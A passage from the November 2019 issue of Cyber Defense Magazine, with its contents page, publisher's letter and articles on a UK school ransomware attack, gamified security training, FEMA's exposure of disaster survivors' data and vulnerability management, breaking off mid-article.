01.11.2019 Views

Cyber Defense eMagazine November 2019

Cyber Defense eMagazine November Edition for 2019 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group

Cyber Defense eMagazine November Edition for 2019 #CDM #CYBERDEFENSEMAG @CyberDefenseMag by @Miliefsky a world-renowned cyber security expert and the Publisher of Cyber Defense Magazine as part of the Cyber Defense Media Group

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

Detrimental Ransomware Effects<br />

3 Must-Do Tasks to Make Vulnerability<br />

Management Useful in Today’s<br />

Environments<br />

How to Address the Top 5 Human Threats<br />

to Your Data<br />

Here’s How You Can Secure Your App from<br />

<strong>Cyber</strong> Attacks<br />

How to Stop <strong>Cyber</strong>security Attacks before<br />

They Start<br />

What Does A <strong>Cyber</strong> Security Consultant<br />

Do?<br />

…and much more…<br />

1


CONTENTS<br />

Detrimental Ransomware Effects ................................................................................................................. 18<br />

Achieving <strong>Cyber</strong>security Readiness with AI-Powered, Gamified Training ....................................................... 21<br />

Talk About a Disaster ................................................................................................................................... 25<br />

3 Must-Do Tasks to Make Vulnerability Management Useful in Today’s Environments .................................. 29<br />

The Intersection of Artificial Intelligence and <strong>Cyber</strong>security .......................................................................... 32<br />

From Guards to Detectives: Evolving the Junior Security Analyst Role ........................................................... 37<br />

Where Property Insurance Ends and <strong>Cyber</strong> Insurance Begins ......................................................................... 41<br />

How to Build an Effective Insider Threat Program: Part I ............................................................................... 44<br />

How to Build an Effective Insider Threat Program: Part II, Technology ........................................................... 49<br />

Modernize the Mission: Implementing TIC 3.0 and Zero Trust Networking .................................................... 55<br />

<strong>Cyber</strong> Resilience: Best Practices from Leading Industry Experts ..................................................................... 58<br />

Are Financial Services the Golden Goose for <strong>Cyber</strong>criminals? ........................................................................ 66<br />

The Social Engineering Methods and Countermeasures ................................................................................ 69<br />

How to Address the Top 5 Human Threats to Your Data ................................................................................ 73<br />

How to Suggest Your Manager to Invest into <strong>Cyber</strong> <strong>Defense</strong>? ........................................................................ 77<br />

So, Ya Wanna Be A Pen Tester, Huh? ............................................................................................................ 81<br />

Simple Ways SMBs Can Protect Themselves against <strong>Cyber</strong>-Threats ............................................................... 86<br />

In A World of External Threats, How Are Business Putting Themselves In Jeopardy? ...................................... 90<br />

Avoiding Misinformation for Content Moderators ........................................................................................ 94<br />

2


How to Keep Your Customer’s Credit Card Information Safe ......................................................................... 98<br />

10 Best Tips for Using Metasploit to Harden Your Network ......................................................................... 102<br />

How Organizations Can Best Avoid GDPR Fines through Continuous Compliance ......................................... 109<br />

Here’s How You Can Secure Your App from <strong>Cyber</strong> Attacks ........................................................................... 113<br />

Sovereign <strong>Cyber</strong> Effects Provided Voluntarily by Allies (SCEPVA) ................................................................. 116<br />

How <strong>Cyber</strong>security Became a Major Issue for Your Business’ SEO ................................................................ 120<br />

How to Erase Data from Mobile Devices: Four Common Misconceptions ..................................................... 123<br />

Secure Data Is Gold: U.S. Immigration Options for <strong>Cyber</strong>security Experts .................................................... 126<br />

<strong>Cyber</strong>security Essentials for Small and Medium Businesses ......................................................................... 131<br />

New <strong>Cyber</strong>security Trend: Hackers Impersonating Other Hackers ................................................................ 135<br />

Software Defined Perimeter Deep Dive & Required Implementation Readiness........................................... 138<br />

Sprint Beta Testing 5G Smart City in Georgia ............................................................................................... 142<br />

Stressing Security Teams ............................................................................................................................ 145<br />

The Importance of <strong>Cyber</strong>security When Dealing With Online Customers ..................................................... 149<br />

How to Stop <strong>Cyber</strong>security Attacks before They Start ................................................................................. 152<br />

What Does A <strong>Cyber</strong> Security Consultant Do? ............................................................................................... 156<br />

A10 Networks Cloud Access Proxy Provides Secure Access and Visibility for SaaS Apps ................................ 159<br />

3 <strong>Cyber</strong>security Trends & Predictions for 2020 (from Illumio) ...................................................................... 162<br />

Applying Security Across Heterogeneous IT Systems ................................................................................... 164<br />

The Security Challenges of Robotic Process Automation—A Primer ............................................................. 168<br />

5 Simple Ways to Protect Your Smartphone from <strong>Cyber</strong> Attacks .................................................................. 172<br />

3


@MILIEFSKY<br />

From the<br />

Publisher…<br />

New <strong>Cyber</strong><strong>Defense</strong>Magazine.com website, plus updates at <strong>Cyber</strong><strong>Defense</strong>TV.com & <strong>Cyber</strong><strong>Defense</strong>Radio.com<br />

Dear Friends,<br />

Can you believe it’s <strong>November</strong> <strong>2019</strong>, already? We’re almost into 2020 but we still have so much to<br />

accomplish this year – we have a new platform going live by December so stay tuned. Don’t miss us at<br />

the InfoSecurity North America show in New York City <strong>November</strong> 20-21, <strong>2019</strong><br />

https://www.infosecuritynorthamerica.com/ before we turn the<br />

corner into an early RSA Conference 2020 in late February, in<br />

San Francisco, CA, USA.<br />

Our 8 th annual InfoSec Awards for 2020 are now open and we<br />

hope to find more winners this year who are market leaders,<br />

innovators and those offering some of the best solutions for<br />

cyber security in the global marketplace. For those women who<br />

did not make our Top 25 Women in <strong>Cyber</strong>security for <strong>2019</strong> or<br />

missed out on the deadline, we have added Women in<br />

<strong>Cyber</strong>security as a new category this year. If you’re an infosec<br />

innovator, please consider applying at:<br />

https://www.cyberdefenseawards.com/<br />

We offer our own statistics that you are free to reuse anytime, from this page:<br />

http://www.cyberdefensemagazine.com/quotables/. We have many new interviews going live on<br />

https://www.cyberdefensetv.com and https://www.cyberdefenseradio.com this month, so please check<br />

them out and share links to them with your friends and co-workers. Let’s all keep on innovating and<br />

finding ways to get one step ahead of the next threat!<br />

Warmest regards,<br />

Gary S. Miliefsky<br />

Gary S.Miliefsky, CISSP®, fmDHS<br />

CEO, <strong>Cyber</strong> <strong>Defense</strong> Media Group<br />

Publisher, <strong>Cyber</strong> <strong>Defense</strong> Magazine<br />

P.S. When you share a story or an article or information about CDM, please use #CDM and @<strong>Cyber</strong><strong>Defense</strong>Mag<br />

and @Miliefsky – it helps spread the word about our free resources even more quickly.<br />

4


@CYBERDEFENSEMAG<br />

CYBER DEFENSE eMAGAZINE<br />

Published monthly by the team at <strong>Cyber</strong> <strong>Defense</strong> Media Group and<br />

distributed electronically via opt-in Email, HTML, PDF and Online<br />

Flipbook formats.<br />

InfoSec Knowledge is Power. We will<br />

always strive to provide the latest, most<br />

up to date FREE InfoSec information.<br />

From the Editor’s Desk…<br />

Turning a corner as leaves turn colors, changes<br />

are coming. Some of the biggest attack vectors<br />

we’re predicting for 2020 include:<br />

• Nation State <strong>Cyber</strong>espionage and<br />

<strong>Cyber</strong>warfare<br />

• Supply Chain Management Exploitation<br />

• Cloud-based Identity Attacks<br />

• New Deep Fake Spear Phishing Attacks<br />

• Mobile Devices Become the Ultimate<br />

Backdoor<br />

• IoT Devices Become New Critical Targets<br />

• Ransomware will continue to escalate<br />

….and we expect much more…so please keep reading,<br />

keep sharing and watch for the latest exploits as well as<br />

the best defenses to get one step ahead of the next<br />

threat, only here, at <strong>Cyber</strong> <strong>Defense</strong> Magazine.<br />

Thank you so much!<br />

To our faithful readers,<br />

Pierluigi Paganini<br />

Editor-in-Chief<br />

PRESIDENT & CO-FOUNDER<br />

Stevin Miliefsky<br />

stevinv@cyberdefensemagazine.com<br />

EDITOR-IN-CHIEF & CO-FOUNDER<br />

Pierluigi Paganini, CEH<br />

Pierluigi.paganini@cyberdefensemagazine.com<br />

EDITOR-AT-LARGE & CYBERSECURITY JOURNALIST<br />

Yan Ross, JD<br />

Yan.Ross@cyberdefensemediagroup.com<br />

ADVERTISING<br />

Marketing Team<br />

marketing@cyberdefensemagazine.com<br />

CONTACT US:<br />

<strong>Cyber</strong> <strong>Defense</strong> Magazine<br />

Toll Free: 1-833-844-9468<br />

International: +1-603-280-4451<br />

SKYPE: cyber.defense<br />

http://www.cyberdefensemagazine.com<br />

Copyright © <strong>2019</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine, a division of<br />

CYBER DEFENSE MEDIA GROUP (a Steven G. Samuels LLC d/b/a)<br />

276 Fifth Avenue, Suite 704, New York, NY 10001<br />

EIN: 454-18-8465, DUNS# 078358935.<br />

All rights reserved worldwide.<br />

PUBLISHER<br />

Gary S. Miliefsky, CISSP®<br />

Learn more about our founder & publisher at:<br />

http://www.cyberdefensemagazine.com/about-our-founder/<br />

WE’RE TURNING A CORNER INTO<br />

8 YEARS OF EXCELLENCE!<br />

Providing free information, best practices, tips and<br />

techniques on cybersecurity since 2012, <strong>Cyber</strong> <strong>Defense</strong><br />

magazine is your go-to-source for Information Security.<br />

We’re a proud division of <strong>Cyber</strong> <strong>Defense</strong> Media Group:<br />

CYBERDEFENSEMEDIAGROUP.COM<br />

MAGAZINE TV RADIO AWARDS<br />

5


6


7


8


9


10


Your website could be vulnerable to outside attacks. Wouldn’t you like to know where those<br />

vulnerabilities lie? Sign up today for your free trial of WhiteHat Sentinel Dynamic and gain a deep<br />

understanding of your web application vulnerabilities, how to prioritize them, and what to do about<br />

them. With this trial you will get:<br />

An evaluation of the security of one of your organization’s websites<br />

Application security guidance from security engineers in WhiteHat’s Threat Research Center<br />

Full access to Sentinel’s web-based interface, offering the ability to review and generate reports as well<br />

as share findings with internal developers and security management<br />

A customized review and complimentary final executive and technical report<br />

Click here to sign up at this URL: https://www.whitehatsec.com/info/security-check/<br />

PLEASE NOTE: Trial participation is subject to qualification.<br />

11


12


13


14


15


16


17


Detrimental Ransomware Effects<br />

Lost coursework and headaches<br />

By Charles Parker, II<br />

Sir John Colfox Academy is a secondary school in Bridport, Dorset in the UK. The school has 828<br />

students, aged between 11 and 18.<br />

Attack<br />

On a fateful work day, much like any other, a staff member received an email. This was one of the<br />

hundreds of emails received on a weekly basis. This however claimed to be a colleague at another Dorset<br />

school. Not thinking a malicious person would have sent this, the staff member opened the email and<br />

clicked on the content on February 28, <strong>2019</strong>. While this may have seem innocent enough, the email<br />

actually appears to have been sent from China and forwarded from a server in Germany.<br />

18


The click opened the door for the systems infection. The network had an issue. The malware was reported<br />

as ransomware and, as expected, immediately began to encrypt the files. The attackers, as with the next<br />

step of the ransomware playbook, demanded money to be paid to them for the decrypt key. The school<br />

consulted with a police expert regarding the substantial issue. After a review, it was noted the attack did<br />

not likely exfiltrate any school data, and staff, student and parent data was not on the system that was<br />

breached. The research into this indicated the attack may have been part of a much larger international<br />

operation.<br />

Data<br />

In particular for this case, Year 11 students submitted their coursework. This coursework was save on<br />

the school’s network. Due to the issue, the coursework in subject was lost. While the description is short,<br />

the devastation is significant. The hope is the student’s had this backed-up somewhere.<br />

Mitigation<br />

The school is working with the particular exam board to resolve the issue. They are also working with the<br />

Dorset Police cyber crime unit. Although there was the demand for funds, no payment was made. This<br />

is generally the policy to take due to the secondary potential issues with just making the payment. The<br />

school had to notify the parents and sent a letter explaining the issue.<br />

Discussion<br />

Targets are generally attacked to compromise their systems to gain access to data for exfiltration or to<br />

extort funds from them. In the early days, these may have been more of an exercise, however, the<br />

attackers have operationalized the model. Ransomware has proven itself to be a completely popular,<br />

viable, and successful attack tool. Over the last four years, this has been very profitable for the attackers.<br />

Lessons Learned<br />

Ransomware is used so often, it is becoming redundant. The frequency is mostly due to the simplicity of<br />

the attack, the financial awards, and this tends to shut down operations until the fee is paid (not advised)<br />

or the issue is remediated through installing back-ups, and a thorough review to ensure nothing was left<br />

behind by the attackers they could use later for re-entry.<br />

There needs to be continued training for the staff. This removed a significant portion of opportunity for an<br />

issue. If the staff know what the usual forms of the attack are, these are less likely to be clicked on, and<br />

fewer systems would be infected. There also needs to be back-ups, which are regularly checked to<br />

ensure they are viable.<br />

19


Resources<br />

Hussain, D. (<strong>2019</strong>, March 14). Secondary school is being held to ransom after a ‘chinese cyber attack’<br />

caused the loss of year 11 student’s GCSE coursework Retrieved from<br />

https://www.dailymail.co.uk/news/article-6808845/Secondary-school-held-ransom-cyber-attack-causedloss-students-GCSE-coursework.html<br />

Sjouwerman, S. (<strong>2019</strong>, March 14). GSCE coursework lost in ransomware attack on UK bridport school.<br />

Retrieved from https://blog.knowbe4.com/gcse-coursework-lost-in-cyber-attack-on-uk-bridport-school<br />

Speck, D. (<strong>2019</strong>, March 15). GCSE coursework lost in ransomware attack. Retrieved from<br />

https://www.tes.com/news/gcse-coursework-lost-ransomware-attack<br />

Wakefield, J. (<strong>2019</strong>, March 13). GCSE coursework lost in cyber attack in bridport school. Retrieved from<br />

https://www.bbc.com/news/uk-england-dorset-47551331<br />

About The Author<br />

Charles Parker, II has been in the computer science/InfoSec industry for over a<br />

decade in working with medical, sales, labor, OEM and Tier 1 manufacturers, and<br />

other industries. Presently, he is a <strong>Cyber</strong>security Lab Engineer at a Tier 1<br />

manufacturer and professor. To further the knowledge base for others in various<br />

roles in other industries, he published in blogs and peer reviewed journals. He<br />

has completed several graduate degrees (MBA, MSA, JD, LLM, and PhD),<br />

completed certificate programs in AI from MIT, other coursework from Harvard,<br />

and researches AI’s application to InfoSec, FinTech, and other areas, and is<br />

highly caffeinated. Charles Parker, II may be reached at<br />

charlesparkerii@protonmail.com.<br />

20


Achieving <strong>Cyber</strong>security Readiness with AI-Powered, Gamified<br />

Training<br />

By Keenan Skelly, Vice President of Global Partnerships and Security Evangelist at Circadence<br />

“THE CYBERSECURITY SKILLS GAP” It is written about so much in the cyber industry that it seems<br />

predetermined, not to mention full of doom and gloom about never-ending, ubiquitous breaches. Yes,<br />

predictors says that there will be 3.5 million unfilled cybersecurity jobs by 2021, which is up from 1 million<br />

openings last year. But that’s not the whole story. It does NOT mean that cyber readiness is unattainable<br />

or that the bad guys have won.<br />

At Circadence, we see that stat as a headlight – providing illumination for rich career opportunity and<br />

stimulation for new approaches to cyber preparedness. There’s unlikely to be a dull moment in a cyber<br />

career as defenders work every day to keep pace with technology advancements and organization digital<br />

transformation, as well as keeping an eagle eye out for how threat actors create new exploitive<br />

circumstances. So, it is continuously critical for cyber warriors to test, train, simulate, emulate and keep<br />

learning. And while we can’t train our way out of the skills gap problem one class or video at a time, we<br />

can use technological advances, in Artificial Intelligence and Machine Learning for example, to automate<br />

and augment the security toolsets, the tasks and processes, and the training platforms. With focus on<br />

the human element that is at the heart of the adversarial relationship, we can redesign the playing field<br />

and hopefully give defenders the home field advantage going forward.<br />

21


Why do we need a new approach to cyber training?<br />

Today’s organizations ARE seeking more cyber staff, but they equally need an inventive and accelerated<br />

training approach that engages cyber professionals to build and retain skills and competencies to keep<br />

positions “filled”. That’s where new advances in artificial intelligence and gamified learning come into play<br />

and create new types of hands-on learning environments. For example, in our Project Ares learning<br />

environment, AI generates adversaries, which require critical thinking and collaborative problem solving<br />

to deter. We put the simulation into a gamified context where badges, scores and friendly competition<br />

motivate progress through learning exercises and cyber challenges.<br />

News headlines remind CISOs and business leaders of the impact of breaches, from financial to<br />

reputational damage and loss of trust. The cybersecurity industry needs a new approach to help adapt<br />

to the speed of cyber threats today through better enablement for incoming and seasoned cyber<br />

professionals. The importance of strengthening organizational security posture often starts with a<br />

company’s digital vanguard defending corporate assets. These team members are juggling a lot of dayto-day<br />

priorities as they proactively protect company assets while trying to stay up-to-date with evolving<br />

risks. The end result of this juggling act is a cyber workforce that is strained, stressed, and often depleted.<br />

In fact, a whopping 93% of respondents to a May <strong>2019</strong> survey agreed they need to keep up with their<br />

skills or their organization will be at risk, yet 66% of respondents in the same study also said it’s hard to<br />

keep up with cybersecurity skills given the demands of their job. The difference between the business<br />

security requirement and the actuality of cyber readiness is indeed a wide gap.<br />

Typically, a professional’s cyber learning journey begins with traditional lecture-style learning, maybe<br />

sitting in a classroom absorbing outdated videos and slideshows, and often at a location that is away<br />

from the office requiring travel budget to attend. However, research shows that when the traditional<br />

classroom approach is paired with a gamified environment that provides hands-on practice in cyber range<br />

environments, student learning retention improves by up to 75%. Add to that research showing that<br />

employees say gamification makes them feel more 89% more productive and 88% happier at work.<br />

Gamified learning can boost motivation and retention, generating upwards of a 60% increase in learner<br />

engagement and 43% enhancement in employee productivity. This applies not only to new cyber<br />

professionals learning basic concepts and skills but also cyber professionals currently in the workforce<br />

looking to mature their cyber skills and learn more advanced cyber tactics. In addition, cyber security<br />

leaders can partner with HR and use gamified platforms to test and assess their current staff to identify<br />

gaps in security knowledge and application, establish improved recruitment goals, and even test new<br />

recruits.<br />

Using AI and gamified training to augment the cyber workforce<br />

Inside a gamified leaning platform, artificial intelligence (AI) is being employed more often to improve the<br />

delivery of education exercises. AI is used to emulate human cognition (e.g. learning based on<br />

experiences and patterns rather than inference) and deep machine learning advancements enable<br />

solutions to ‘teach themselves’ how to build models for pattern recognition. This becomes particularly<br />

22


valuable in cyber skills development where Natural Language Processing (NLP), a sub-category of AI,<br />

can communicate with a human during cyber exercises and aid in their progression through activities. An<br />

example of how NLP works within a gamified learning environment is through cybersecurity learning<br />

platform Project Ares®. The in-game advisor, Athena, uses NLP to communicate with players in a “chatbot”<br />

format providing guidance to players so they can complete cyber asks and meet learning objectives for<br />

certain work roles. Athena generates a response from its learning corpus, using machine learning to<br />

aggregate and correlate all the player conversations it has plus integrating knowledge about how users<br />

progress through exercises. The pattern recognition helps Athena recommend the most efficient path to<br />

solving a problem or scenario. Similar to the “two heads are better than one” motto, but machine learning<br />

needs lots of “heads” (aka: data) to generate the best solution for the problem at hand.<br />

AI is also used to create the adversary in Project Ares missions. These missions are developed from<br />

real-world cyber threats using either a defensive or offensive approach. The player is challenged to solve<br />

problems through critical thinking and actions and as they begin to think like the unauthorized user, their<br />

understanding of defensive behavior also improves. This capability provides greater learning potential<br />

for users who are not only using defensive techniques with AI but also using offensive techniques with<br />

data AI provides. <strong>Cyber</strong> professionals can engage in a learning platform that offers relevant cyber<br />

exercises to build skill and competency with the support of artificial intelligence, NLP and hands-on<br />

machine learning all within a gamified range environment.<br />

A new era of cyber training<br />

For organizations that are stymied by the skills gap and struggle to hire the right skills in cyber<br />

organizations, take a look at the challenge from a different angle. Through the benefits of AI in gamified<br />

training, cyber professionals can learn advanced ways to offensively and defensively protect their<br />

companies, build new skills, and develop problem solving tactics in real-world scenarios. This advanced<br />

method of training takes cyber learning to new heights by improving retention with hands-on learning that<br />

can take place anywhere versus at off-site cyber training courses. With new training options such as<br />

gamified training now available to companies, seasoned and prospective cyber professionals have all<br />

the critical tools needed to prepare themselves for future cyber threats—and companies have the<br />

resources necessary to persistently harden their cyber readiness posture. For more information on<br />

gamified training, visit www.circadence.com.<br />

About Circadence<br />

Circadence Corporation is a market leader in next-generation cybersecurity readiness. Powered by a<br />

culture of innovation and the demands of an evolving cyber landscape, Circadence offers award-winning<br />

cyber range solutions and cybersecurity learning platforms, running on Microsoft Azure, that leverage<br />

artificial intelligence and custom content to address critical security challenges for enterprise, government<br />

and academic institutions. Circadence's solutions deliver persistent, immersive and true-to-life<br />

experiences that match and adapt to contemporary threat environments. For more information,<br />

visit www.circadence.com.<br />

23


Author the Author<br />

Keenan Skelly, Vice President of Global<br />

Partnerships and Security Evangelist at<br />

Circadence<br />

Keenan Skelly has more than 20 years<br />

of experience providing security and management<br />

solutions across a wide array of platforms to<br />

include personnel, physical, and cybersecurity.<br />

She brings over ten years of government service<br />

with a focus on National Security. Skelly served in<br />

the U.S. Army as an Explosive Ordnance Disposal<br />

Technician and went on to work for the<br />

Department of Homeland Security where she<br />

served as Chief for Comprehensive Reviews in the<br />

Office for Infrastructure Protection.<br />

Cites:<br />

• https://www.talentlms.com/blog/gamification-survey-results/<br />

• https://www.pulselearning.com/blog/gamification-infographic/<br />

• https://www.csoonline.com/article/3200024/cybersecurity-labor-crunch-to-hit-35-million-unfilledjobs-by-2021.html<br />

• https://searchsecurity.techtarget.com/news/252463186/Effects-of-cybersecurity-skills-shortage-<br />

worsening-new-study-says?track=NL-<br />

1820&ad=927520&src=927520&asrc=EM_NLN_112933934&utm_medium=EM&utm_source=N<br />

LN&utm_campaign=<strong>2019</strong>0515_Shortage%20of%20cybersecurity%20skills%20puts%20busines<br />

s%20at%20risk<br />

24


Talk About a Disaster<br />

Fema Exposes Disaster Survivor’s Personal Data<br />

By Charles Parker, II; MBA/MSA/JD/LLM/PhD<br />

FEMA’s mission involves assisting citizens as they face natural disasters (hurricanes, wildfires, etc.).<br />

Over the years, FEMA has had its ups and downs, mostly published in the media outlets. These have<br />

mostly involved missteps with the supplies, mobile homes, and various other issues.<br />

When the citizens have been a victim of one of the natural disasters, they have too much on their mind<br />

with family, pets, home, and other assets. Feelings and emotions tend to run high during these times.<br />

The last thing they need to be concerned with is to work through identity theft or who have purchased<br />

their personal information.<br />

Issue<br />

Unfortunately, FEMA inadvertently allowed the unauthorized access to over 2M person’s private and<br />

confidential data. The issue was reported in the March 14, <strong>2019</strong> audit by the Department of Homeland<br />

Security’s Office of Inspector General report.<br />

25


Data<br />

In the case of a disaster when the person applies for assistance from FEMA, the person is required to<br />

use the Transitional Sheltering Assistance Program. This program has assisted persons from the 2017<br />

California wildfire, Hurricanes Howey, Irma, and Maria, and many other disasters. The exposed data was<br />

for the applicants of these natural disasters, numbering 2.3M to 2.5M. This included the home addresses<br />

and banking information (bank name and account number; with the bank’s name securing the routing<br />

number is easy). Of the affected persons, 1.8M had both types of data available to unauthorized parties,<br />

and 725 had only their address involved.<br />

Normally this type of data may not be simply housed in a government database. This, however, was<br />

required from the applicant as this would be used for the payments for the assistance and to record data.<br />

There was a legitimate reason to have this.<br />

Oops<br />

The exposure presented another notable problem for FEMA. As a course of business, FEMA contracts<br />

with third parties for specific functions. Having all of the services that would be needed across the US<br />

within FEMA would be problematic, as the agency is not constantly assisting others. There is not a<br />

hurricane or massive wildfire every month. As part of this contractual agreement, certain information on<br />

the assistance recipients is necessary. FEMA has unintentionally given more information on the affected<br />

persons than what was required to a contractor. In this case, the contractor was involved with providing<br />

temporary housing.<br />

The data shared with the had an additional 20 fields in the database, which should have not been sent,<br />

as this was not germane to their function and scope of work. In the Inspector General report, the<br />

contractor’s name had been redacted. FEMA effectively has the potential to put the affected persons at<br />

risk for identity theft and/ or fraud based on the error for the over 2.3M persons already stressed by the<br />

circumstances. This is also a violation of the Privacy Act of 1974 and the DHS Management Directive<br />

11042.1.<br />

Remediation<br />

The issue is rather notable. Once detected, this has led to changes in how FEMA manages its client’s<br />

personally identifiable information (PII). FEMA was working with the contractor to remove the<br />

unnecessary data from their system. DHS had two recommendations to FEMA for correcting the issue.<br />

First, FEMA implements controls to ensure only the authorized data is sent to the contractor. Second,<br />

FEMA ensures the data previously issued to the contractor is destroyed. Although this resolves one<br />

aspect of the issue, this does not directly or indirectly address the impact on the persons involved. They<br />

are still at risk and would have to pay for any identity monitoring services themselves.<br />

26


Discussion<br />

When you demand and require from a person, especially with no bargaining power or leverage, data in<br />

exchange for services they require to live, you become a steward of the information. You are responsible<br />

for the safekeeping and acting as a reasonably prudent organization with this. The release of the data or<br />

unauthorized access has detrimental short- and long-term effects for the affected parties.<br />

For an epic error of this magnitude to still be occurring is not acceptable at any level. The persons have<br />

to deal with having their lives uprooted with their respective natural disasters. In addition to this, the 2.3-<br />

2.5M persons now also have to deal with watching for their funds to evaporate into the ether, or possible<br />

identity theft if the purchaser is a crafty social engineer. This could, of course, been much worse for the<br />

affected parties. The issue brings up two points. What would make FEMA staff members think a<br />

contractor focused on providing the temporary housing would need with the affected person’s banking<br />

information? Also, once they received the additional unauthorized data, why didn’t they notify FEMA?<br />

When the file was downloaded, seemingly the contractor’s staff would wonder why that was present.<br />

Resources<br />

Achenbach, J., Wan, W., & Romm, T. (<strong>2019</strong>, March 22). FEMA ‘major privacy-incident’ reveals data from<br />

2.5 million disaster survivors. Retrieved from https://www.washingtonpost.com/national/healthscience/fema-data-breach-hits-25-million-disaster-survivors/<strong>2019</strong>/03/22/<br />

and<br />

https://www.chicagotribune.com/news/nationworld/ct-fema-privacy-data-breach-<strong>2019</strong>0322-story.html<br />

Associated Press. (<strong>2019</strong>, March 22). FEMA wrongfully released personal data of 2.3 million disaster<br />

victims: Watchdog. Retrieved from https://cnbc.com/<strong>2019</strong>/03/22/fema-exposed-personal-data-of-<br />

2point3-million-disaster-victims-watchdog.html<br />

Brufke, J. (<strong>2019</strong>, March 22). FEMA exposed personal information of 2.3 million disaster survivors.<br />

Retrieved from https://thehill.com/policy/cybersecurity/435386-fema-exposed-personal-information-of-<br />

23-million-disaster-survivors<br />

Kelly, J.V. (<strong>2019</strong>, March 15). Management alert-FEMA did not safeguard disaster survivor’s sensitive<br />

personally identifiable information (REDACTED). Retrieved from<br />

https://www.oig.dhs.gov/sites/default/files/assets/<strong>2019</strong>-03/OIG-19-32-Mar19.pdf<br />

Keck, C. (<strong>2019</strong>, March). FEMA breach exposes personal data and banking information of 2.3 million<br />

disaster survivors. Retrieved from https://gizmodo.com/fema-breach-exposes-personal-data-andbanking-informati-183350871<br />

Linton, C. (<strong>2019</strong>, March 22). FEMA exposed personal information of 2.3 million disaster victims. Retrieved<br />

from https://www.cbsnews.com/news/fema-data-breach-exposed-personal-information-of-2-3-milliondisaster-victims/<br />

27


Lyngaas, S. (<strong>2019</strong>, March 22). FEMA exposed personal data on 2.3 million disaster survivors, violated<br />

privacy law, IG finds. Retrieved from https://www.cyberscooop.com/fema-exposed-personal0data-2-3-<br />

million-disaster-survivors-violated-privacy-law-ig-finds/<br />

Matt, N. (<strong>2019</strong>, March 23). FEMA privacy disaster reveals information of 2.5 million americans. Retrieved<br />

from<br />

https://www.tomshardware.com/news/fema-reveals-information-2-5-million-disastersurvivors.38903.html<br />

Sukin, G. (<strong>2019</strong>, March 22). FEMA exposes personal, banking details of 2.5 million disaster survivors.<br />

Retrieved from https://www.axos.com/fema-data-breach-leaks-personal-banking-information-25-milliondisaster-survivors-33912b1c-03b6-458f-a5cd-d791fb2bdb2.html<br />

About the Author<br />

Charles Parker, II has been in the computer science/InfoSec industry for over<br />

a decade in working with medical, sales, labor, OEM and Tier 1<br />

manufacturers, and other industries. Presently, he is a <strong>Cyber</strong>security Lab<br />

Engineer at a Tier 1 manufacturer and professor. To further the knowledge<br />

base for others in various roles in other industries, he published in blogs and<br />

peer reviewed journals. He has completed several graduate degrees (MBA,<br />

MSA, JD, LLM, and PhD), completed certificate programs in AI from MIT,<br />

other coursework from Harvard, and researches AI’s application to InfoSec,<br />

FinTech, and other areas, and is highly caffeinated. Charles Parker, II may<br />

be reached at charlesparkerii@protonmail.com.<br />

28


3 Must-Do Tasks to Make Vulnerability Management Useful in<br />

Today’s Environments<br />

By Jim Souders, Chief Executive Officer, Adaptiva<br />

I recently heard an executive describe how his team essentially threw its vulnerability report in the trash<br />

every time they received one. This seemed a bit extreme, but he informed a group of conference<br />

attendees that it wasn’t because the vulnerability reports didn’t contain important information—it was<br />

because they have become so overwhelming.<br />

Vulnerability management vendors today are routinely scanning for more than 100,000 vulnerabilities.<br />

Imagine the strain that places on an organization if even only a fraction of these vulnerabilities are found<br />

within their network. Then consider the feeling associated with the knowledge that there is no possible<br />

way to address them all in an effective time frame that will ensure that you are not at risk.<br />

The excessive number of vulnerabilities only will continue to increase, opening up space for<br />

cyberattackers to take advantage. Because of this, vulnerability management was listed as one of the<br />

top projects for organizations to get a handle on at Gartner’s <strong>2019</strong> Security and Risk Summit. The<br />

problem is IT teams don’t know where to start. Vendors need to step up to help them.<br />

Here are three things that must be done across the board in the vulnerability management space to assist<br />

teams in getting the basics covered.<br />

29


Give the User Control<br />

With millions of vulnerabilities being presented to IT administrators and security operations, there needs<br />

to be effective and easy ways to quickly read and interpret the data. If vulnerability management software<br />

spits out a bunch of data without providing different ways to sort and highlight it, it becomes incredibly<br />

difficult for IT to work with or act on. Yet, this is how vulnerability management has been conducted for<br />

years—to the point where it is now considered simply voluminous and unactionable.<br />

To elevate vulnerability management and allow it to have a positive impact, reporting mechanisms need<br />

to provide the IT and SecOps users with more control over how they want to consume and evaluate<br />

vulnerability data. Every company has different priorities that define where they want to focus energy and<br />

resources. As such, they require tools that let them customize the analysis and resulting reports to meet<br />

their needs. Evolving the user interface to accommodate the user is the first step to making a vulnerability<br />

report meaningful and actionable to IT operations.<br />

Determine What Matters and Why<br />

Out of all of the thousands of vulnerabilities found, then which ones do teams address? Which ones are<br />

open? There needs to be a simple way to determine very quickly what requires attention and in what<br />

priority. To help IT operations teams get to the starting line, vulnerability management tools must do more<br />

to assess the risk specific vulnerabilities pose.<br />

Most of the vulnerabilities exploited last year were not considered high-severity vulnerabilities. This is<br />

largely because cyberattackers have learned that companies are conditioned to fix the critical or highrank<br />

vulnerabilities first; therefore, they go after medium level threats to gain entry. Because these issues<br />

have traditionally been considered lower priority, chances are good that understaffed and overworked<br />

teams have yet to address many of these vulnerabilities. Bad actors can then infiltrate systems and wreak<br />

havoc because of an issue that likely could have been fixed relatively easily. As this practice becomes<br />

more common, it is evident that a CVSS score alone is not enough. For vulnerability management to be<br />

effective, vendors need to come up with intelligent ways not only to rank severity and impact but also the<br />

likelihood that a particular vulnerability will be exploited.<br />

Execute a Rapid Response<br />

Once software fetches vulnerability data, teams filter it according to their needs and assess and prioritize<br />

which vulnerabilities to attack first—there has to be a mechanism for immediate action. Modern solutions<br />

should provide simple ways for staff to respond quickly to what they see and learn. Organizations that<br />

are left to their own devices to develop and execute fixes through manual processes or custom scripts<br />

are at a distinct disadvantage. IT and SecOps are often unable to work together in a rapid, cohesive, and<br />

collaborative process to deploy a patch enterprise-wide. SecOps teams are frequently overwhelmed with<br />

their own issues. As a result, system updates and patches can take a long time to execute, contributing<br />

to the backlog and extending the window a company is susceptible to attack.<br />

30


Intelligent automated solutions are being developed to take this burden off of teams so that vulnerabilities<br />

can be identified, assessed, and addressed near instantaneously. Platforms that integrate these solutions<br />

with endpoint management tools, software distribution tools, or patching tools enable their users to<br />

immediately send out system updates, patches, or configuration changes. By doing so, this increases<br />

